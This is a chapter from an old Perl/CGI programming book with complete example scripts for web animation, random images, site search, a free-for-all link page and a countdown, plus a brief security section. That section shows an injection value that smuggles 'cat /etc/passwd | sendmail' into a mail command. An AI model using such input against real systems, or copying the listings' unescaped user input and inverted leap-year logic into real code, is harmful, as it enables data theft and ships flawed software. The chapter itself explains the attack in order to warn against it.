Chapter 20

Tips and Techniques for Perl

by Matt Wright


CONTENTS

For many programmers, Perl is the answer for common CGI and other miscellaneous programming tasks that require short and effective code. Because Perl is interpreted, there's no need to declare variables, allocate memory, or do many of the other routines that C requires before you can actually begin programming.

This chapter focuses on the many aspects of programming CGI scripts and applications with Perl. In this chapter, you'll learn

Perl CGI Examples

The following sections cover a few examples of real-life Perl/CGI programs. I'll demonstrate CGI programs and then explain why and how they work. All the programs covered are freely available, and the newest versions can be downloaded at http://www.worldwidemart.com/scripts/.

NOTE
When I describe how to call the CGI programs and how to name them for your server, I assume that you have access to the cgi-bin. On some servers, the .pl files may need to be renamed to .cgi before they will properly execute. When in doubt, ask your system administrator if you have cgi-bin access

Animation

The first script I'll analyze is a simple animation program. If you choose to implement this script, Netscape users will see an animation when they load your page. You need to have access to a cgi-bin or permission to execute CGI programs for this to work.


Listing 20.1  nph-anim.pl: Web Animation Perl/CGI Script
#!/usr/local/bin/perl
# Animation PERL/CGI Script     Version 1.2
# Written by Matt Wright          mattw@misha.net
# Created on: 9/28/95        Last Modified on: 1/29/96
# Scripts Archive at:   http://www.worldwidemart.com/scripts/
#########################################################
# Define Variables

# The $times variable represents how many times you want your
# animation to be looped.

$times = "1";

# $basefile defines the path on your filesystem to the images you
# plan to use in your animation.

$basefile = "/WWW/images/animation/";

# @files is an array that lists all of the images that you wish
# to be displayed during the course of your animation.

@files = ("begin.gif","second.gif","third.gif","last.gif");

# $con_type is the content-type header that will be accompanied
# with the images.  For any GIF images, set this equal to 'gif'
# and if you plan on using JPEG images, set this variable equal
# to 'jpeg'.

$con_type = "gif";

# Done
#########################################################

# Unbuffer the output so it streams through faster and better

select (STDOUT);
$| = 1;

# Print out a HTTP/1.0 compatible header. Comment this line out
# if you change the name of the script to not have an nph in
# front of it.

print "HTTP/1.0 200 OK\n";

# Start the multipart content

print "Content-Type: ";
print "multipart/x-mixed-replace;boundary=myboundary\n\n";
print "--myboundary\n";

# For each file print the image out, and then loop back and print
# the next image.  Do this for all images as many times as $times
# is defined as.

for ($num=1;$num<=$times;$num++) {
   foreach $file (@files) {
      print "Content-Type: image/$con_type\n\n";
      open(PIC,"$basefile$file");
      print <PIC>;
      close(PIC);
      print "\n--myboundary\n";
   }
}

The two lines in listing 20.1 that are similar to


select(STDOUT);
$| = 1;

tell the Perl compiler not to buffer the output of the images when sending them to the user. Normally, Perl stores information into an internal buffer, and when that information reaches a certain size, it relays the contents of the buffer to the correct location, whether that be a Web browser, a file on your system, or the command line. The preceding two lines select the STDOUT file handle (which leads to the browser) and then tell Perl not to buffer the information by setting $| to 1. This allows your data to flow more smoothly and will make your animation appear less jerky.

To continue the flow of your animation and to keep it from getting jerky, it's suggested that you name the CGI program beginning with an nph-. When your server sees a CGI program that has a file name beginning with nph-, it takes that file and doesn't send a parsed header. The nph stands for non-parsed header. That's why the HTTP/1.0 200 OK statement must be sent out. The server, which usually sends this statement, isn't parsing your file, and therefore you have to send the line out to the browser.

NOTE
If you choose not to use a file name beginning with nph-, you'll simply need to put a # at the beginning of the line similar to # print "HTTP/1.0 200 OK\n"; to comment it out

The script then sends out a content-type header multipart, which only Netscape now recognizes. Netscape interprets this to mean that several different items will be sent, and they will be separated with the statement --myboundary--. After that's sent, the script rotates through all the images, sending them out one at a time, followed by a boundary statement, which tells the browser to replace the image and show the new one. This creates the effect of pictures being pushed onto your screen. If they move fast enough and the motions are small enough, these pictures represent an animation or a small video. The script continues to send the images until it gets to the last one; if you want the animation to loop, it loops for the number of times you specified in the $times variable.

To call this animation from your HTML document, you can use a standard image tag, which looks something like this:


<img src="http://www.server.xxx/path/to/nph-anim.pl">

CAUTION
The animation script now works with only Netscape browsers because it uses a Netscape-specific content-type header. It has been known to break some browsers, causing the rest of the page not to load or messing up the browsers in other ways. Test the animation script on any browsers you think might be visiting your page, and realize that not everyone will be able to see your animation

Random Image Generator

The Random Image Generator takes a predetermined list of images and randomly chooses one of them to send back to the browser. This program, shown in listing 20.2, can be used to generate random logos, backgrounds, or any other inline image in your Web page.


Listing 20.2  rand_image.pl: The Random Image Displayer
#! /usr/local/bin/perl
# Random Image Displayer          Version 1.2
# Created by: Matt Wright     mattw@misha.net
# Created On: 7/1/95          Last Modified: 1/29/96
# Scripts Archive at:   http://www.worldwidemart.com/scripts/
#################################################################
# Necessary Variables

# $baseurl defines the URL path to the directory that contains
# the images you wish to randomize.

$baseurl = "http://www.server.xxx/pics/";

# @files is an array which consists of the filenames, located at
# the URLs referenced with the $baseurl above that you wish to
# put in the randomizer.

@files = ("waterfalls.gif","test.gif","random.gif","neat.jpg");

# $uselog is a variable that allows you to choose whether or not
# you wish to log each time the random image generator generates
# a new picture.  If you choose to set this variable equal to '1'
# (thus turning it on), then the name of the image that was
# chosen will be saved to a log file.

$uselog = 0; # 1 = YES; 0 = NO

# If $uselog is set to '1', you must define this variable so that
# it points to the file that you want to contain the logged
# images.

$logfile = "/home/mattw/public_html/image/pics/piclog";
# Done
#################################################################

# Seed a Random Number of Time to the power of the Process ID.
srand(time ** $$);

# Pick the random number with the rand() function.
$num = rand(@files); # Pick a Random Number

# Print Out Header With Random Filename and Base Directory
print "Location: $baseurl$files[$num]\n\n";

# Log Image
if ($uselog eq '1') {
   open (LOG, ">>$logfile");
   print LOG "$files[$num]\n";
   close (LOG);
}

This program is very compact, yet it gets the job done. After the variables are defined, the seeded random number generator is given the time, taken to the exponent of the process ID, so that it will be random each time the program is called.

The next statement chooses a random number, which can be no greater than the number of files in @files. This ensures that a valid image is picked. After you pick the random number, you simply send back a location header to the browser, giving it the URL ($baseurl plus the file), so that it can locate the image and display it.

Finally, if you turned the logging option on, the program opens your log file and writes the name of the image to it so that you can see which images are hit the most often.

To invoke this program from your HTML document, you can use a standard image call, such as the following:


<img src="http://www.server.xxx/path/to/rand_image.pl">

TIP
You can also use the random image displayer to generate random background images. To do this, you would call the script like so:
<body background="http://www.server.xxx/pth/to/rand_image.pl"

Simple Search

The Simple Search script consists of an HTML file, where users input their terms and search options, and a CGI script, which does the searching. It's designed to search through small sites and return those documents that contain the keywords specified by the user. It's relatively fast, although trying to use this script on a server with more than 300 or 400 files on it would be unreasonable because it doesn't precompile the data in any way. Nonetheless, it can be a useful tool for allowing users to search your site. Listing 20.3 shows the source to the HTML, and listing 20.4 shows the CGI script.


Listing 20.3  search.htm: Simple Search Engine HTML Page
<html>
 <head>
  <title>Simple Search Engine</title>
 </head>
 <body bgcolor=#FFFFFF text=#000000>
  <center>
   <h1>Simple Search Engine</h1>
  </center>

        Use the form below to search through the files on this server!
<p><hr size=7 width=75%><p>

<form method=POST action="http://www.server.xxx/search.cgi">
<center>
<table border>
<tr>
<th>Text to Search For: </th>
<th><input type=text name="terms" size=40><br></th>
</tr>

<tr>
<th>Boolean: <select name="boolean">
<option>AND
<option>OR
</select> </th> <th>Case <select name="case">
<option>Insensitive
<option>Sensitive
</select><br></th>
</tr>

<tr>
<th colspan=2><input type=submit value="Search!">
<input type=reset><br></th>
</tr>
</table>
</center>
</form>
</body>
</html>


Listing 20.4  search/search.pl: Simple Search Engine Perl CGI Script
#!/usr/bin/perl
################################################################
# Simple Search Script     Version 1.0
# Written By Matt Wright     mattw@tahoenet.com
# Created on: 12/16/95     Last Modified on: 1/29/96
# Scripts found at:          http://www.worldwidemart.com/scripts/
################################################################
# Define Variables

# $basedir should be the system path to the files and directories
# you wish to search.

$basedir = '/path/to/files/you/wish/to/search/';

# $baseurl should be the same path as $basedir, except
# represented as a URL, so that the user can get to the web page
# when the filename is returned.

$baseurl = 'http://worldwidemart.com/scripts/';

# @files is an array that specifies which files you wish to
# search.  Wildcards, in the form of a (*) are accepted.  So to
# search all html files in the basedir and all text files, you
# would configure @files as:

@files = ('*.html','*.txt');

# The $title is the title of the page you are searching.  This
# will be returned on the results page as a way to get back to
# the main page.

$title = "My Web Server";

# $title_url is the URL that will be linked to the text in $title
# on the results page.

$title_url = 'http://www.server.xxx/';

# This is the URL to the search form; search.html

$search_url = 'http://www.server.xxx/search.html';

# Done
################################################################

# Parse Form Search Information
&parse_form;

# Get Files To Search Through
&get_files;

# Search the files
&search;

# Print Results of Search
&return_html;

sub parse_form {

   # Get the input
   read(STDIN, $buffer, $ENV{'CONTENT_LENGTH'});

   # Split the name-value pairs
   @pairs = split(/&/, $buffer);

   foreach $pair (@pairs) {
      ($name, $value) = split(/=/, $pair);

      $value =~ tr/+/ /;
      $value =~ s/%([a-fA-F0-9][a-fA-F0-9])/pack("C",hex($1))/eg;

      $FORM{$name} = $value;
   }
}

sub get_files {

   # Change Directories to $basedir
   chdir($basedir);

   # Loop through the files in @files and with the ls command
   # determine all files that need to be searched.  This is
   # necessary so that the wildcards can be expanded into
   # filenames.
   foreach $file (@files) {
      $ls = `ls $file`;
      @ls = split(/\s+/,$ls);
      foreach $temp_file (@ls) {

         # If the file is a directory, then adjust the filename
         # accordingly.
         if (-d $file) {
            $filename = "$file$temp_file";
            if (-T $filename) {
               push(@FILES,$filename);
            }
         }

         # Otherwise, if the file is a text file, we can search
         # it.
         elsif (-T $temp_file) {
            push(@FILES,$temp_file);
         }
      }
   }
}

sub search {

   # Split the Search Terms that the user entered by spaces.
   @terms = split(/\s+/, $FORM{'terms'});

   foreach $FILE (@FILES) {

      # Open the File, Read it Into an Array.
      open(FILE,"$FILE");
      @LINES = <FILE>;
      close(FILE);

      # Join the LINES in the FILE with a space, and then take
      # out all new line characters.
      $string = join(' ',@LINES);
      $string =~ s/\n//g;

      # The loops below determine which syntax to use based on
      # user input such as case (in)sensitivity and the boolean
      # term (and/or)

      if ($FORM{'boolean'} eq 'AND') {
         foreach $term (@terms) {
            if ($FORM{'case'} eq 'Insensitive') {

               # If the string doesn't contain one of the terms,
               # don't include the file in report.
               if (!($string =~ /$term/i)) {
                  $include{$FILE} = 'no';
                  last;
               }
               else {
                  $include{$FILE} = 'yes';
               }
            }
            elsif ($FORM{'case'} eq 'Sensitive') {

               # If the string doesn't contain one of the terms
               # exactly, do not include it.
               if (!($string =~ /$term/)) {
                  $include{$FILE} = 'no';
                  last;
               }
               else {
                  $include{$FILE} = 'yes';
               }
            }
         }
      }
      elsif ($FORM{'boolean'} eq 'OR') {
         foreach $term (@terms) {
            if ($FORM{'case'} eq 'Insensitive') {

               # If string contains one of the terms, then
               # include the file in report.
               if ($string =~ /$term/i) {
                  $include{$FILE} = 'yes';
                  last;
               }
               else {
                  $include{$FILE} = 'no';
               }
            }
            elsif ($FORM{'case'} eq 'Sensitive') {

               # If the string includes one of the terms exactly
               # as entered, then include the file in report.
               if ($string =~ /$term/) {
                  $include{$FILE} = 'yes';
                  last;
               }
               else {
                  $include{$FILE} = 'no';
               }
            }
         }
      }

      # Attempt to locate the title of the page to display in
      # results.
      if ($string =~ /<title>(.*)<\/title>/i) {
         $titles{$FILE} = "$1";
      }
      else {
         $titles{$FILE} = "$FILE";
      }
   }
}

# Return the HTML and Results to User.
sub return_html {
   print "Content-type: text/html\n\n";
   print "<html>\n";
   print " <head>\n";
   print "  <title>Results of Search</title>\n";
   print " </head>\n";
   print " <body>\n";
   print "  <center>\n";
   print "   <h1>Results of Search in $title</h1>\n";
   print "  </center>\n\n";
   print "Below are the results of your Search in no ";
   print "particular order:<p><hr size=7 width=75%><p>\n";
   print "<ul>\n";
   foreach $key (keys %include) {
      if ($include{$key} eq 'yes') {
        print "<li><a href=\"$baseurl$key\">$titles{$key}</a>\n";
      }
   }
   print "</ul>\n";
   print "<hr size=7 width=75%>\n";
   print "Search Information:<p>\n";
   print "<ul>\n";
   print "<li><b>Terms:</b> ";
   $i = 0;
   foreach $term (@terms) {
      print "$term";
      $i++;
      if (!($i == @terms)) {
         print ", ";
      }
   }
   print "\n";
   print "<li><b>Boolean Used:</b> $FORM{'boolean'}\n";
   print "<li><b>Case $FORM{'case'}</b>\n";
   print "</ul><br><hr size=7 width=75%><P>\n";
   print "<ul>\n";
   print "<li><a href=\"$search_url\">Back to Search Page</a>\n";
   print "<li><a href=\"$title_url\">$title</a>\n";
   print "</ul>\n";
   print "<hr size=7 width=75%>\n";
   print "Search Script written by Matt Wright and can be found";
   print "at <a href=\"http://www.worldwidemart.com/scripts/\">";
   print "Matt's Script Archive</a>\n";
   print "</body>\n</html>\n";
}

The search form allows users to input multiple terms separated by spaces, choose whether they want to perform a case-sensitive or case-insensitive search, and choose whether to have terms joined with the OR or AND Boolean operator. If they choose OR, pages that match any of the terms are displayed. If they choose AND, any pages that match all terms are displayed.

After you define your variables and the files you want to search, the script is ready to be used.

TIP
If you want to search recursively down directories, you'll have to wait for a new version, because that's now not available. To get around this limitation, however, you can put the following into your @files variable:
@files = ('*.html','*/*.html','*/*/*.html');
This searches three directories deep, including all HTML files.

The first part of the script calls a subroutine that parses the form contents from the search form and sets up all the search variables needed for the rest of the script. After that, the next subroutine that's called retrieves all the file names that you've defined in @files and creates an expanded array, @FILES, which will have filled out your wild cards and directory structure. This allows for easier searching by the script, and the script then has file names it can return to the user, appended to the baseurl, providing a link to that page on the results page.

The third subroutine called actually does the searching. It loops through all the files and, depending on the searching criteria the user entered, cycles through all the terms, searching each page to make sure that it contains the search term(s). If it contains the search terms, it adds them to the list of pages to return. Otherwise, it adds them to the list of pages to ignore.

The final subroutine, return_html, does what its title implies-it returns the HTML pages to the user. The results have a list of pages that match the search criteria, in no particular order.

Free for All Link Page

The Free for All Link Page allows users to add any link they want to an HTML document automatically. The CGI script then takes the document and adds the user's link and title to it. The source to the Free For All Link Page Perl/CGI script can be found in listing 20.5.


Listing 20.5  links.pl: Adding the User's Link and Title to the Document
#!/usr/local/bin/perl
# Free For All Link Script       Version: 2.1
# Created by Matt Wright        mattw@misha.net
# Created On: 5/14/95           Last Modified: 1/29/96
#################################################################
# Define Variables

# The $filename variable represents the system path to your
# links.html file, which will contain all of your links and the
# form to add new links.

$filename = "/home/mattw/public_html/links/links.html";

# $linksurl is the URL to the same file as you listed in
# $filename, except this is the reference that will be used to
# return users to your link file.

$linksurl = "http://your.host.xxx/links/links.html";

# The $linkspl variable specifies the URL to your links.pl
# PERL/CGI script.  This is used as the action for the form if a
# user fails to enter their URL or title.

$linkspl = "http://your.host.xxx/cgi-bin/links.pl";

# This is the path to your system's date command.

$datecom = '/usr/bin/date';

# Done
#################################################################

# Get the Current Date.
$date = `$datecom +"%r on %A, %B %d, %Y %Z"`; chop($date);

# Get the input
read(STDIN, $buffer, $ENV{'CONTENT_LENGTH'});

# Split the name-value pairs
@pairs = split(/&/, $buffer);

foreach $pair (@pairs) {
   ($name, $value) = split(/=/, $pair);

   $value =~ tr/+/ /;
   $value =~ s/%([a-fA-F0-9][a-fA-F0-9])/pack("C", hex($1))/eg;
   $value =~ s/<([^>]|\n)*>//g;

   # Create an associative array (%FORM) that contains all of the
   # names and values that were input into the form.

   $FORM{$name} = $value;
}

# Send Errors back to the user if they failed to fill in the URL
# or Title portion of the links.html form.

&no_url if ($FORM{'url'} eq 'http://');
&no_url unless $FORM{'url'};
&no_title unless $FORM{'title'};

# Enter our tags and sections into an associative array

%sections =  ( "busi","Business","comp","Computers",
               "educ","Education","ente","Entertainment",
               "gove","Government","pers","Personal",
               "misc","Miscellaneous");

# Determine How Many Links Are Currently in the Link File.
$response = `grep '<li><a href' $filename`;
@data = split(/\n/,$response);

$i=1;

foreach $line (@data) { # For every line in our data
  $i++;
}

# Open Previous Link File and Put it into one large string to
# manipulate later.

open (FILE,"$filename");
@LINES=<FILE>;
close(FILE);
$SIZE=@LINES;

# Loop through the entire file and if the line equals
# <!--number--> or <!--date-->, it will insert the new values.
# Otherwise, it simply prints the line back into the HTML file.

open (FILE,">$filename");
for ($a=0;$a<=$SIZE;$a++) {
   $_=$LINES[$a];
   if (/<!--number-->/) {
      print FILE "<!--number--><b>There are <i>$i</i> links ";
      print FILE "on this page.</b><br>\n";
   }
   elsif (/<!--time-->/) {
      print FILE "<!--time--><b>Last link was added at ";
      print FILE "$date</b><hr>\n";
   }
   else {
      print FILE $_;
   }
}
close (FILE);

open (FILE,"$filename");

while (<FILE>) {
   $raw_data .=  $_;
}

close(FILE);

# Make a normal array out of this data, one line per entry.
# NOTE: This eats up our newline characters, so be sure to add
# them back when we print back to the file.

undef $/;
@proc_data = split(/\n/,$raw_data);

# Open Link File to Output
open (FILE,">$filename");

foreach $line (@proc_data) { # For every line in our data

   print FILE "$line\n";   # Print the line.  We have to do this
                           # no matter what, so let's get it over
                           # with.

   # If the section tag equals the one the user wishes to add
   # their link to, add it.  Otherwise, just continue.
   foreach $tag (keys(%sections)) { # For every tag
      if ( ($FORM{section} eq $sections{$tag}) &&
         ($line =~ /<!--$tag-->/) ) {

         print FILE "<li><a href=\"$FORM{'url'}\">";
         print FILE "$FORM{'title'}</a>\n";
      }
   }
}

close (FILE);

# Return Link File
print "Location: $linksurl\n\n";

# If the User forgot to enter a URL for their link, then simply
# send them this message, and followup form, which explains that
# they need to fill out everything before they can continue.

sub no_url {
   print "Content-type: text/html\n\n";
   print "<html><head><title>NO URL</title></head>\n";
   print "<body><h1>ERROR - NO URL</h1>\n";
   print "You forgot to enter a url you wanted added to the ";
   print "Free for all link page.<p>\n";
   print "<form method=POST action=\"$linkspl\">\n";
   print "<input type=hidden name=\"title\" ";
   print "value=\"$FORM{'title'}\">\n";
   print "<input type=hidden name=\"section\" ";
   print "value=\"$FORM{'section'}\">\n";
   print "URL: <input type=text name=\"url\" size=50><p>\n";
   print "<input type=submit> * <input type=reset>\n";
   print "<hr>\n";
   print "<a href=\"$linksurl\">Back to the Free for all Link";
   print "Page</a>\n";
   print "</form></body></html>\n";

   # Exit since there was an error.
   exit;
}

# Send out a similar error message if the user forgot to enter a
# title for their link.

sub no_title {
   print "Content-type: text/html\n\n";
   print "<html><head><title>NO TITLE</title></head>\n";
   print "<body><h1>ERROR - NO TITLE</h1>\n";
   print "You forgot to enter a title you wanted added to ";
   print "the Free for all link page.<p>\n";
   print "<form method=POST action=\"$linkspl\">\n";
   print "<input type=hidden name=\"url\" ";
   print "value=\"$FORM{'url'}\">\n";
   print "<input type=hidden name=\"section\" ";
   print "value=\"$FORM{'section'}\">\n";
   print "TITLE: <input type=text name=\"title\" size=50><p>\n";
   print "<input type=submit> * <input type=reset>\n";
   print "<hr>\n";
   print "<a href=\"$linksurl\">Back to the free for all links";
   print "page</a>\n";
   print "</form></body></html>\n";

   # Exit Since there was an error.
   exit;
}

Listing 20.6 is the HTML and form that must be used along with the Free For All Link Script in listing 20.5. It includes hidden markers for the script to insert URLs at that point.


Listing 20.6  links/links.html: Free For All Link Page HTML Source
<html>
 <head>
  <title>Free For All Link Page</title>
 </head>
 <body>
  <center>
   <h1>Free For All Link Page</h1>
  </center>
This a free-for-all list of links, meaning you can add 
anything you please. When you add an URL, you're 
automatically returned to this page and your URL should 
appear. Remember to <b>Reload</b> your browser.<p><hr>.
<!--number--><b>There are <i>0</i> Links on this Page.</b><br>
<!--time--><b>No Links Added
<p><hr>

<form method=POST action="http://your.host.xxx/cgi-bin/links.pl">
Title: <input type=text name="title" size=30><br>
URL: <input type=text name="url" size=55><br>
Section to be placed in: <select name="section">
<option> Business
<option> Computers
<option> Education
<option> Entertainment
<option> Government
<option> Personal
<option selected> Miscellaneous
</select>
<br>
<input type=submit value="Add Link"> * <input type=reset>
</form>
<hr>
Quick Jump:<br>
[ <a href="#business">Business</a>
| <a href="#computers">Computers</a>
| <a href="#education">Education</a>
| <a href="#entertainment">Entertainment</a>
| <a href="#government">Government</a>
| <a href="#personal">Personal</a>
| <a href="#misc">Misc</a> ]<hr><p>

<a name="business">Business</a><p>
<ul>
<!--busi-->
</ul><hr>

<a name="computers">Computers</a><p>
<ul>
<!--comp-->
</ul><hr>

<a name="education">Education</a><p>
<ul>
<!--educ-->
</ul><hr>

<a name="entertainment">Entertainment</a><p>
<ul>
<!--ente-->
</ul><hr>

<a name="government">Government</a><p>
<ul>
<!--gove-->
</ul><hr>

<a name="personal">Personal</a><p>
<ul>
<!--pers-->
</ul><hr>

<a name="misc">Miscellaneous</a><p>
<ul>
<!--misc-->
</ul><hr>

Script Created by Matt Wright and can be found at
<a href="http://worldwidemart.com/scripts/">Matt's Script Archive</a>.
<hr>
</body></html>

The Free for All Link Page is a lot more complicated than the animation script discussed earlier. In this example, you have a specific form and page that correspond to the CGI script, rather than just the CGI/Perl script. The comments inside the HTML file (which resemble <!--xxxx-->) are markers. When the script opens this file to add the new link, it tries to locate these markers so that the link can be placed in the correct spot.

In the links.pl file, after the variables are defined, a routine will decode all the form results and place them into an associative array, %FORM. These values can then be referenced later in the script and used to input data and determine where to place the link and what to place.

Next, the Perl script checks to make sure that the URL and Title fields of the form are filled in. If they are, it allows the script to continue; otherwise, it calls on a subroutine for the appropriate error message and sends the users another form, explaining the error and asking them to fill in the necessary information.

After that, if the script hasn't exited on an error because of lack of information, the script will grep out the URLs located in your links.htm file. This determines the number of links so that the script can write this out to the file, showing the users how many links are located on your free-for-all links page.

The data is now read from your existing links file and parsed twice. The first time, the <!--number--> and <!--date--> comments are replaced with the actual number of links and the date that the last link was added. The second time around, the script determines which <!--xxxx--> matches the section that the user wanted to add to, and when the script finds this section, it adds the new URL to the top of the list, moving everything down. The file is rewritten and the user is returned to the link page.

Countdown

Listing 20.7 is an example of date manipulation and how you can add and subtract data, use arrays to specify days of the week, months of the year, and more. This program can be used as a countdown to any year, month, day, hour, minute, or second that you specify.


Listing 20.7  countdown.pl: Countdown Program
#!/usr/local/bin/perl

# Countdown Script for the WWW     Version 1.21
# Created by Matt Wright               mattw@worldwidemart.com
# Created on: 8/31/95                  Last Modified: 1/29/96
# Scripts located at:      http://www.worldwidemart.com/scripts/

##################################
# Define Variables

# @from_date = (yyyy,mm,dd,hh,mm,ss);
# Which means: (year,month,day,hour,minute,second)
# Configuring the following @from_date variable as in the above
# examples will set the default date.  You can also specify a
# from_date on the fly, by calling the script with a url similar
# to:
#     http://www.server.xxx/countdown.pl?2000,1,1,0,0,0
# That would set the from_date to count down to January 1, 2000.

@from_date = (2000,1,1,0,0,0);

# Done
##################################

# If there is a QUERY_STRING, we will assume they wish to count
# down to the date specified on the QUERY_STRING, so we will
# break it down into @from_date by commas.
if ($ENV{'QUERY_STRING'}) {
   $ENV{'QUERY_STRING'} =~ s/%2C/,/g;
   $ENV{'QUERY_STRING'} =~ s/=//g;
   @from_date = split(/,/, $ENV{'QUERY_STRING'});
}

# Define when various things occur, different dates, etc...
&define_dates;

# Calculate the differences in the two dates
&calc_dates;

# Make Sure we don't get negative times. That's not cool...
&no_negative;

# Top of HTML Page Information
&html_header;

# We don't want it to say 1 Years, now, do we?  Of course not!
&proper_english;

# End of HTML Page Information
&html_trailer;

sub define_dates {

   # Define Future Time Variables.
   ($f_year,$f_month,$f_day,$f_hour,$f_minute,$f_second) =
                                                      @from_date;

   # Get Current Time Variables
   ($second,$minute,$hour,$day,$month,$year,$wday,$yday,$isdst) =
                                                 localtime(time);

   # Put the Year into a 4 digit year, rather than 2.
   $year ="19$year";

   # Check to see if it is a leap year.
   &leap_year_check;

   # Define the names of months.
   @months = ( "XX","January","February","March","April","May",
               "June","July","August","September","October",
               "November","December");

   # Define the days of month.
   @days = ("XX","1st","2nd","3rd","4th","5th","6th","7th","8th",
            "9th","10th","11th","12th","13th","14th","15th",
            "16th","17th","18th","19th","20th","21st","22nd",
            "23rd","24th","25th","26th","27th","28th",
            "29th","30th","31st");

   # Define how many days are in each month
   @days_in_month = (31,$feb_days,31,30,31,30,31,31,30,31,30,31);

   # This is the English terminology for the date, like January
   # 1st.
   $date_term = "$months[$f_month] $days[$f_day]";

   # Keep adding to the date_term unless the user has said they
   # wish to not include a certain time, like seconds, or
   # minutes, or years, etc...
   unless ($f_year eq 'XX') {
      $date_term = "$date_term, $f_year";
   }
   unless ($f_hour eq 'XX') {
      $date_term = "$date_term $f_hour";
   }
   unless ($f_minute eq 'XX') {
      if ($f_minute < 10) {
         $date_term = "$date_term:0$f_minute";
      }
      else {
         $date_term = "$date_term:$f_minute";
      }
   }
   unless ($f_second eq 'XX') {
      if ($f_second < 10) {
         $date_term = "$date_term:0$f_second";
      }
      else {
         $date_term = "$date_term:$f_second";
      }
   }

# Start the Current Date
$current_date = "$months[($month + 1)] $days[$day], $year $hour";
   if ($minute < 10) {
      $current_date = "$current_date:0$minute";
   }
   else {
      $current_date = "$current_date:$minute";
   }
   if ($second < 10) {
      $current_date = "$current_date:0$second";
   }
   else {
      $current_date = "$current_date:$second";
   }

}

# Check to see if it is a leap year.  If a year is divisible by 4
# and not divisible by 100, then it is a leap year.
sub leap_year_check {
   $yeardiv = ($year / 4);
   $yearint = int($yeardiv);
   $yeardiv1 = ($year / 100);
   $yearint1 = int($yeardiv1);

   # 29 days in february on leap year, 28 on regular year.
   if (($yeardiv eq $yearint && $yeardiv1 ne $yearint1) || ($year
        % 400 == 0)) {
      $feb_days = "28";
   }
   else {
      $feb_days = "29";
   }
}
# Calculate the dates by subtracting the current dates from the
# future dates.
sub calc_dates {
   $real_year = ($f_year - $year);
   $real_month = (($f_month - 1) - $month);
   $real_day = ($f_day - $day);
   $real_hour = ($f_hour - $hour);
   $real_minute = ($f_minute - $minute);
   $real_second = ($f_second - $second);
}

# Now make sure we don't end up with values such as negative
# minutes.  Instead, we must subtract 1 hour, and add 60 minutes
# to get a positive minute value.
sub no_negative {
   if ($real_second < 0) {
      $real_second = ($real_second + 60);
      $real_minute--;
   }

   if ($real_minute < 0) {
      $real_minute = ($real_minute + 60);
      $real_hour--;
   }

   if ($real_hour < 0) {
      $real_hour = ($real_hour + 24);
      $real_day--;
   }

   if ($real_day < 0) {
     $real_day = ($real_day + @days_in_month[$month]);
      $real_month--;
   }

   if ($real_month < 0) {
      $real_month = ($real_month + 12);
      $real_year--;
   }
}

# Use proper English, such as 1 second and 2 seconds, not 1
# seconds or 2 second.
sub proper_english {
   unless ($f_year eq 'XX') {
      if ($real_year eq '1') {
         print "$real_year Year<br>\n";
      } else {
         print "$real_year Years<br>\n";
      }
   }

   unless ($f_month eq 'XX') {
      if ($real_month eq '1') {
         print "$real_month Month<br>\n";
      } else {
         print "$real_month Months<br>\n";
      }
   }

   unless ($f_day eq 'XX') {
      if ($real_day eq '1') {
         print "$real_day Day<br>\n";
      } else {
         print "$real_day Days<br>\n";
      }
   }

   unless ($f_hour eq 'XX') {
      if ($real_hour eq '1') {
         print "$real_hour Hour<br>\n";
      } else {
         print "$real_hour Hours<br>\n";
      }
   }

   unless ($f_minute eq 'XX') {
      if ($real_minute eq '1') {
         print "$real_minute Minute<br>\n";
      } else {
         print "$real_minute Minutes<br>\n";
      }
   }

   unless ($f_second eq 'XX') {
      if ($real_second eq '1') {
         print "$real_second Second<br>\n";
      } else {
         print "$real_second Seconds<br>\n";
      }
   }
}

# Print out the Top of the HTML page.
sub html_header {
   print "Content-type: text/html\n\n";
   print "<html><head>\n";
   print "<title>Countdown to: $date_term</title>\n";
   print "</head><body>\n";
   print "<center><h1>Countdown to: $date_term</h1>\n";
   print "<hr>\n";
}

# Print out the bottom of the HTML page.
sub html_trailer {
   print "<hr>\n";
   print "It is currently $current_date\n";
   print "</center>\n";
   print "</body></html>\n";
}

The countdown script isn't as complex as it looks. Instead, there's a lot of defining of values and printing of numbers and text to the screen. For example, you must calculate how many days are in February, whether it's a leap year or a regular year. You must also make sure that there are no negative values, except for the years, which will occur whenever your time has already come and gone.

The first subroutine that's called from this script is used simply to define dates, determine the current time and the future time you're counting down to, and define the names of months, days, and more.

The subroutine following that, calc_dates, actually subtracts the current time from the future time, giving you raw data of how much time is left until the future date arrives. Unfortunately, this information could be partly negative. For instance, if the minutes in the future are less than those in the present, the number will be negative-yet there's no reason to have negative minutes if you have positive hours. So the next subroutine, no_negative, is called. This subroutine checks to see whether any values are negative. If they are, it cancels out a time higher (for example, if days are negative, it cancels out a month and adds the appropriate days to the negative number, making it positive).

After the subroutine no_negative is called, you know how much time until the future date arrives, so all you have to do is print this to the screen. First, html_header is called, so the title and header get to the browser first. Then the proper_english subroutine is called. If the value is 1 for years, months, days, hours, minutes, or seconds, the script will print out 1 year, day, hour, and so on. If the value is 0 or greater than 1, the script will print out XX years, days, hours, and so on, so that the English stays correct, and you don't print 1 years or 5 hour.

Finally, the html_trailer is printed to the screen and the script exits. You now have the countdown to the second displayed on-screen.

Calling this script from your HTML document is rather easy. Say that you want to count down to Christmas 1996. You would place the following in your HTML document:


<a href="http://www.server.xxx/countdown.pl?1996,12,25,0,0,0">
Countdown to Christmas 1996!</a>

This produces the results of the countdown and tells you exactly how long it will be. One problem that might arise is that the years will always be zero. So, you think, why display them? Using an XX for a value in @from_date will cause that time to be disregarded in the printing, so you could call the same date as


<a href="http://www.server.xxx/countdown.pl?XX,12,25,0,0,0">
Countdown to Christmas 1996!</a>

TIP
You can allow users to pick their own dates to count down to also. If you include the following piece of code in your HTML document, users can decide what date they want to count down to:
<form method=GET action="http://www.server.xxx/countdown.pl">
<input type=text name="" size=30> (Format: yyyy,mm,dd,hh,mm,ss)
<p>
<input type=submit value="Countdown!"> <input type=reset>
</form

Perl Security Concerns

Dealing with CGI scripts and user input always involves security risks. One thing you want to be sure to avoid is letting raw user input get into a system() or exec() type call. For instance, if you ask users to input their e-mail address in a form, and then you plan on mailing them letters, don't use their e-mail address when you invoke your mailing program. Take the following piece of code, where all form variables are placed in the associative array %in, much like cgi-lib.pl would do:


open(MAIL,"|sendmail $in{'e-mail'}");

Then print the rest of the mail message and close the MAIL file handle, thus sending the message.

But what if one of your users decides to input the following into the form as his or her e-mail address?


mattw@tahoenet.com; cat /etc/passwd | sendmail mattw@tahoenet.com

